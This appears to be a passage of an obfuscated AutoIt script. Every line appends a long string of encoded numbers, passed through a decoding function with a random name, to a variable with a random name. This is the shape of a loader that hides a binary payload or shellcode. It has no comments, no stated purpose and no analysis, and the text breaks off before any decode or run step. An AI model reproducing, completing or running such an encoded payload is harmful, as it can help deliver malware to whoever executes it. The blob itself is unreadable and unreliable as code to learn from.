("56,60,56,60,56,60,56,60,56,6,57,56,56,56,56,55,57,56,56,56,56,55,56,60,56,6,57,58,57,56,57,55,57,55,56,6,57,59,56,58,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,57,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,54,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,5,56,60,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,58,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,56,56,55,56,6,56,60,56,55,56,60,57,55,56,6,56,6,56,59,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,56,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,54,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,54,57,54,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,54,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,60,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,55,57,56,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,6,56,60,56,60,56,60,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,57,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,56,57,58,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,6,56,56,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,55,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,57,56,5,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,53,57,57,56,6,57,56,56,6,56,55,57,57,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,58,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("59,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,53,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,53,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,59,56,6,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,53,56,6,56,6,57,56,56,6,56,55,56,60,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,60,56,5,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,53,56,56,56,6,57,56,56,6,56,55,57,54,56,60,57,54,56,5" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,54,57,59,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,53,56,60,56,6,57,56,56,6,56,55,57,58,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,55,57,58,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,54,57,57,56,6,57,56,56,6,56,55,56,53,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,56,57,57,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,57,57,57,56,60,56,59,56,60,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,6,57,56,56,6,56,55,57,54,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,56,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,58,57,58,56,55,57,55,56,60,57,54,56,6,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,54,56,6,57,58,56,55,57,56,56,59,56,56,56,6,56,5,56,56,56,55,56,54,56,56,56,6,57,56,56,6,56,55,56,55,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,59,57,55,57,55,56,55,57,54,57,54,57,54,57,54,56,6,57,58,56,55,57,56,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,57,56,6,56,5,56,56,56,55,56,54,56,60,56,6,57,56,56,6,56,55,56,5,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,5,57,57,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,55,57,57,56,6,57,56,56,6,56,55,56,56,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,6,57,56,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,56,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,53,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,57,55,56,6,56,53,57,58,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,55,56,6,56,6,57,56,56,6,56,55,57,58,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,54,57,57,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,55,56,56,56,6,57,56,56,6,56,55,56,59,57,57,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,55,57,56,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,56,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,5,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,56,57,58,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,54,56,6,56,6,57,56,56,6,56,55,57,58,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,56,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,58,57,56,56,6,57,55,56,6,56,57,56,56,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,55,56,60,56,6,57,56,56,6,56,55,57,54,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,57,56,56,56,56,55,57,56,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,58,57,56,56,6,57,55,56,6,56,59,57,56,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,56,56,6,56,6,57,56,56,6,56,55,57,59,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,56,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,58,57,56,56,6,57,55,56,6,56,60,56,54,57,55,56,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,56,56,56,56,6,57,56,56,6,56,55,56,6,56,60,57,54,57,57,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,56,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,58,57,56,56,6,57,55,56,6,57,55,57,54,57,55,56,56,57,54,57,54,57,54,57,54,56,6,57,58,56,55,57,56,56,59,56,6,56,6,56,5,56,56,56,55,56,56,57,57,56,6,57,56,56,6,56,55,57,56,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,56,57,56,57,55,56,56,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,57,56,56,56,6,57,56,56,6,56,55,56,57,56,56,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,57,55,56,6,57,57,57,55,57,55,56,56,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,57,56,6,56,6,57,56,56,6,56,55,56,59,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,58,57,54,57,55,56,56,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,57,57,57,56,6,57,56,56,6,56,55,57,59,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,58,56,60,57,55,56,56,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,56,56,60,56,6,57,56,56,6,56,55,57,58,56,60,57,54,57,57,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,56,55,56,60,57,54,57,54,56,53,56,55,57,55,56,6,57,54,57,54,57,56,56,54,56,6,56,5,56,56,56,55,56,57,56,60,56,6,57,56,56,6,56,55,56,6,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,56,53,56,55,57,55,56,6,57,54,57,54,57,56,56,54,56,6,57,58,56,55,57,56,56,60,57,57,56,6,56,5,56,56,56,55,56,58,57,57,56,6,57,56,56,6,56,55,56,53,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,6,56,60,57,55,56,56,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,58,56,6,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,57,56,56,6,56,55,56,55,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,53,56,59,57,55,56,56,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,58,56,56,56,6,57,56,56,6,56,55,56,57,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,57,56,56,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,54,57,59,56,55,57,55,56,6,56,5,56,56,56,55,56,58,56,60,56,6,57,58,56,56,56,55,56,60,56,6,56,55,56,5,56,6,57,56,56,53,56,55,56,60,57,57,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,58,57,54,56,6,57,54,56,57,57,59,56,55,56,55,57,54,56,55,57,55,56,55,57,58,57,57,56,5,57,57,56,58,56,53,57,57,56,60,56,59,56,6,57,56,56,6,57,56,57,55,56,56,57,54,56,6,57,54,57,54,57,54,57,54,56,55,56,59,56,54,57,59,57,54,57,54,57,54,57,54,57,56,56,60,56,57,56,5,56,5,57,56,57,55,56,56,57,54,56,6,57,54,57,54,57,54,57,54,56,60,57,54,56,6,56,56,56,5,56,59,57,54,56,6,57,54,57,54,57,54,57,54,56,6,57,56,56,6,56,55,56,57,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("5,56,56,56,60,56,55,56,60,56,6,57,56,56,6,56,55,56,57,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,58,56,56,57,55,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,6,56,55,56,6,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56,5,56,56,56,60,56,55,56,60,56,6,57,56,56,6,56,55,56,6,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,58,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,56,60,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,6,56,55,56,56,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56,5,56,56,56,60,56,55,56,60,56,6,57,56,56,6,56,55,56,56,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,56,56,56,57,54,56,54,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,6,56,55,57,54,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56,5,56,56,56,60,56,55,56,60,56,6,57,56,56,6,56,55,57,54,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,57,57,57,57,54,56,56,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,6,56,55,56,55,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,56,56,60,56,55,56,5,56,55,56,60,56,6,57,56,56,6,56,55,56,55,56,60,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,55,57,54,57,54,57,54,57,54,57,55,56,5,56,6,57,57,57,54,56,6,57,54,57,54,57,54,57,54,56,55,56,55,56,6,57,58,57,55,57,57,56,6,56,59,57,55,57,57,56,53,57,57,56,60,56,54,56,60,56,60,56,60,56,60,56,55,56,57,56,55,56,54,56,55,56,53,57,54,57,54,56,53,56,55,56,60,56,6,57,54,57,54,56,5,56,55,56,57,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,56,56,60,56,55,56,60,57,54,57,54,56,53,56,55,56,60,56,6,56,6,57,56,56,6,56,55,56,6,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,56,5,56,55,56,56,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,57,57,57,56,56,56,59,56,60,56,54,56,6,56,60,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,54,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,56,6,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,56,5,56,55,56,56,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,58,56,55,57,56,56,60,57,57,56,6,57,58,56,53,56,57,56,57,57,57,56,57,56,57,57,54,57,54,56,54,57,59,56,59,56,60,56,6,57,56,56,56,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,55,56,6,56,55,56,60,56,6,56,5,56,53,57,56,57,55,56,60,56,6,56,5,56,53,57,56,57,54,57,57,56,6,56,5,56,53,57,56,57,56,56,6,56,6,56,5,56,53,57,56,57,54,56,6,56,6,56,5,56,53,57,56,57,56,57,57,56,60,56,57,57,54,56,57,57,54,57,54,56,5,56,55,56,57,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,54,57,59,56,56,56,56,56,6,57,56,56,6,56,55,56,54,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,56,5,56,55,56,57,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,54,56,6,57,57,57,57,56,60,56,58,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,5,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,56,5,56,55,56,57,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,59,56,57,57,55,56,55,56,60,56,56,56,55,56,60,56,60,56,60,56,60,56,53,56,55,56,58,57,55,56,6,57,56,56,56,56,55,57,55,56,6,56,55,56,60,56,6,57,56,56,6,56,55,56,54,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,56,55,56,53,56,55,56,53,56,54,56,6,56,60,57,57,56,60,56,60,56,60,56,60,56,60,56,6,56,55,56,53,56,55,56,53,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,55,56,53,56,6,57,56,56,6,56,55,56,54,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,56,5,56,55,56,58,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,55,57,57,56,60,56,53,56,55,56,59,56,60,56,55,56,57,57,54,57,54,56,5,56,55,56,58,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,57,56,57,57,57,56,60,56,55,57,54,56,55,57,55,56,55,57,58,57,57,56,5,57,57,56,58,56,6,56,60,56,60,56,59,56,55,56,53,56,54,57,59,56,59,56,6,56,6,57,56,56,56,56,55,57,58,56,56,56,55,56,60,56,55,56,53,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,53,56,55,57,55,56,6,57,54,57,54,56,5,56,55,56,53,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,55,56,53,56,54,57,59,56,60,56,56,56,6,57,56,56,56,56,55,56,60,56,6,56,55,56,60,56,6,57,58,56,56,56,55,57,58,56,6,56,6,56,57,57,57,56,60,56,60,56,6,56,55,56,60,57,54,57,54,56,53,56,55,57,55,56,6,56,6,56,5,56,53,57,56,56,60,56,6,57,54,57,54,56,5,56,55,56,6,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,55,57,57,56,60,56,53,56,5,56,60,57,57,56,55,56,53,57,54,57,54,56,53,56,55,57,55,56,6,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,5,56,55,56,55,57,57,56,60,56,59,56,60,56,60,56,60,56,60,57,55,57,58,57,58,57,57,56,6,57,58,56,56,56,55,56,60,56,6,56,57,57,58,56,56,56,54,56,57,56,56,56,53,56,55,56,60,57,55,56,55,56,60,57,54,57,54,56,53,56,55,57,55,56,6,57,54,57,54,56,5,56,55,56,54,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,55,57,57,56,60,56,53,56,6,57,56,57,55,56,6,57,58,56,56,56,54,56,55,56,60,56,55,56,53,56,54,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,56,54,57,59,56,56,56,60,56,6,56,5,56,56,56,55,57,56,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,57,56,56,56,56,55,57,56,56,60,56,55,56,60,56,55,56,53,56,54,56,6,56,59,57,54,56,60,56,60,56,60,57,54,56,60,56,60,56,6,57,56,56,56,56,55,57,55,56,60,56,55,56,60,56,6,56,5,56,53,57,56,57,56,56,56,57,54,57,54,56,5,56,55,56,6,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,55,57,57,56,60,56,53,56,6,57,58,56,55,56,6,57,58,56,56,56,55,57,56,56,60,56,54,57,59,56,56,56,60,56,55,56,53,56,54,57,59,56,60,56,58,56,6,56,5,56,56,56,55,57,56,56,6,56,6,57,56,56,56,56,55,57,56,56,6,56,55,56,60,56,55,56,53,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,55,56,53,56,6,57,56,56,56,56,55,57,54,57,57,56,55,56,60,56,54,57,59,57,54,57,54,57,54,57,54,56,53,56,55,57,55,56,60,57,54,57,54,56,5,56,55,56,53,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,55,57,57,56,60,56,53,56,6,56,5,56,60,56,6,57,58,56,56,56,54,56,57,56,56,56,6,56,5,56,56,56,55,57,54,56,6,56,6,57,58,56,56,56,55,57,56,56,60,56,6,56,5,56,56,56,55,57,56,57,57,56,6,57,58,56,56,56,55,56,60,56,6,56,57,57,58,56,56,56,54,56,57,56,56,56,53,56,58,56,60,57,54,56,57,57,58,56,56,56,54,56,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,53,56,53,56,60,57,59,56,55,56,60,57,54,57,54,56,53,56,55,57,55,56,6,57,54,57,54,56,5,56,55,56,54,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,54,57,59,56,56,56,60,56,55,56,53,56,54,57,59,56,60,56,58,56,6,57,56,56,56,56,55,57,56,57,57,56,55,56,60,56,55,56,53,56,55,56,53,56,55,56,53,56,6,57,56,56,56,56,55,57,54,56,6,56,55,56,60,57,54,57,54,56,53,56,55,57,55,56,6,57,54,57,54,56,53,56,55,57,55,56,60,57,54,57,54,56,5,56,55,56,53,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,55,57,57,56,60,56,53,56,5" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,59,57,59,56,55,56,53,57,54,57,54,56,53,56,55,57,55,56,6,57,54,57,54,56,5,56,55,56,55,57,57,56,60,56,59,56,60,56,60,56,60,56,60,57,54,57,54,56,53,56,55,57,54,57,57,56,54,57,59,57,54,57,54,57,54,57,54,56,5,56,55,56,54,57,57,56,60,56,59,56,60,56,60,56,60,56,60,57,55,56,5,57,54,57,58,57,54,57,55,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,54,56,55,56,56,56,6,57,58,56,55,57,58,56,57,57,57,57,54,57,54,56,53,56,55,56,60,57,57,57,54,57,54,56,53,56,55,57,54,57,57,57,54,57,54,56,5,56,55,56,55,56,56,56,60,56,59,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,57,56,57,57,57,56,60,56,6,56,57,57,57,56,56,56,60,57,57,56,6,56,5,56,53,57,56,57,55,56,56,56,54,56,54,56,57,57,58,56,56,56,54,56,60,56,54,56,53,56,57,56,57,56,58,56,6,57,58,56,56,56,55,56,60,57,57,56,6,57,56,56,5,57,57,56,60,56,57,56,60,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,58,56,60,56,57,56,60,56,57,56,56,56,55,56,60,57,57,57,54,57,54,56,53,56,57,57,54,57,57,56,55,56,60,56,6,57,58,56,56,56,57,57,54,56,6,56,60,56,57,56,56,56,55,57,54,57,57,56,55,56,60,57,54,57,54,56,5" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,56,55,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,60,57,54,57,58,56,53,56,56,56,54,56,60,56,54,56,6,56,57,57,57,56,56,56,60,57,57,57,54,57,54,56,56,56,55,57,55,56,56,56,6,56,57,57,57,56,57,56,58,56,6,56,57,56,5,56,56,56,55,57,55,56,56,56,53,56,58,57,56,56,6,56,6,57,56,56,56,56,55,57,57,57,57,56,55,56,60,56,54,57,59,56,60,56,56,56,6,57,56,56,56,56,55,57,54,56,6,56,55,56,60,56,6,57,58,56,56,56,55,57,58,56,6,56,6,56,57,57,57,56,60,56,60,56,6,56,55,56,60,57,54,57,54,56,53,56,55,57,55,56,6,56,6,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("5,56,53,57,56,57,57,57,57,57,54,57,54,56,5,56,55,56,53,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,5,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,56,53,56,55,57,55,57,57,57,57,56,53,56,6,56,55,56,5,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,60,56,53,56,60,56,60,56,60,56,59,56,60,56,60,57,54,57,54,56,5,56,55,56,54,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,56,55,57,57,56,60,56,60,57,54,56,6,56,6,57,59,56,58,57,54,57,55,57,54,57,54,57,54,57,54,56,6,57,58" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,54,56,58,56,6,56,60,56,57,56,56,56,55,57,54,56,6,56,6,56,5,56,6,56,55,56,56,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,6,57,56,56,6,56,55,56,5,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,56,53,56,55,57,55,57,57,57,54,57,54,56,5,56,55,56,54,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,55,56,53,56,6,56,55,57,57,56,60,56,60,57,54,56,6,56,6,56,57,56,59,57,54,57,54,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,55,57,55,57,57,57,54,57,54,56,5,56,55,56,54,56,6,56,60,56,59,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,6,56,55,57,57,56,60,56,60,57,54,56,6,56,6,56,59,57,54,57,54,57,54,57,54,57,54,57,54,57,54,56,6,57,58,56,56,56,55,57,55,56,6,57,55,56,5,56,58,57,55,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,55,56,6,57,58,57,55,57,57,56,6,56,57,57,55,56,56,57,54,56,6,56,6,56,59,57,55,57,57,56,58,56,6,56,60,56,56,56,60,56,60,56,60,56,60,56,6,56,57,57,59,56,56,56,58,56,56,56,56,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,60,56,60,56,55,56,54,56,55,56,53,56,6,56,59,57,55,57,57,56,53,56,6,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,59,56,60,56,60,56,60,56,60,56,54,57,59,56,55,57,55,56,55,56,5,56,6,57,58,57,54,57,57,56,6,57,56,56,6,56,56,56,58,56,56,56,57,56,60,56,60,56,56,56,60,56,60,56,60,56,60,56,6,57,56,57,58,56,56,56,58,56,56,57,58,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,55,56,60,57,54,56,57,57,59,56,55,57,55,56,6,57,54,57,58,57,55,56,58,57,54,57,54,57,54,57,54,56,54,57,59,56,55,57,55,56,55,56,5,56,54,57,59,56,54,56,54,56,6,57,58,57,54,56,60,56,55,56,6,56,54,57,59,56,53,56,58,56,6,57,56,56,53,57,57,56,58,56,56,56,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,57,54,56,57,57,59,56,55,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,59,56,60,56,55,56,6,56,54,57,59,56,54,56,55,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,59,56,58,56,55,56,6,56,54,57,59,56,54,57,55,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,59,56,56,56,55,56,6,56,54,57,59,56,54,56,57,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,59,56,54,56,55,56,6,56,54,57,59,56,54,56,6,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,59,56,6,56,55,56,6,56,54,57,59,56,53,56,5,56,54,56,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,6,56,5,56,56,56,56,56,58,56,56,56,59,57,59,56,55,56,6,56,54,57,59,56,55,57,54,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,59,57,57,56,55,56,6,56,54,57,59,56,53,56,57,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,59,57,55,56,55,56,6,56,54,57,59,56,54,56,6,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,58,56,60,56,55,56,6,56,54,57,59,56,54,56,55,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,58,56,58,56,55,56,6,56,54,57,59,56,54,57,57,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("58,56,56,56,55,56,6,56,54,57,59,56,54,56,57,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,58,56,54,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,58,56,6,56,55,56,6,56,54,57,59,56,54,57,54,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,58,57,59,56,55,56,6,56,54,57,59,56,54,56,56,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,58,57,57,56,55,56,6,56,54,57,59,56,54,56,55,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,58,57,55,56,55,56,6,56,54,57,59,56,55,57,54,56,54,56,54,56,6,56,5,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,58,56,56,56,57,56,60,56,55,56,6,56,54,57,59,56,57,56,60,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,57,56,58,56,55,56,6,56,54,57,59,56,57,56,59,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,57,56,56,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,57,56,54,56,55,56,6,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,57,56,56,56,57,56,57,57,57,56,60,56,54,56,54,56,6,56,5,56,56,56,56,56,58,56,56,56,57,56,54,56,6,57,56,56,56,56,56,56,58,56,56,56,60,57,57,56,55,56,60,56,54,57,59,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,54,57,59,56,60,56,60,57,54,57,54,56,55,56,56,56,58,56,56,56,55,56,6,57,54,57,54,56,53,56,55,56,60,56,6,57,54,57,54,56,5,56,56,56,58,56,56,56,54,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,55,56,5,56,55,56,60,57,54,57,54,56,53,56,55,56,60,56,6,56,6,57,56,56,6,56,56,56,58,56,56,57,58,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,55,56,60,57,54,57,54,56,5,56,56,56,58,56,56,56,6,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,57,56,57,57,57,56,60,56,6,56,57,57,57,56,56,56,60,57,57,56,58,56,59,56,56,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA 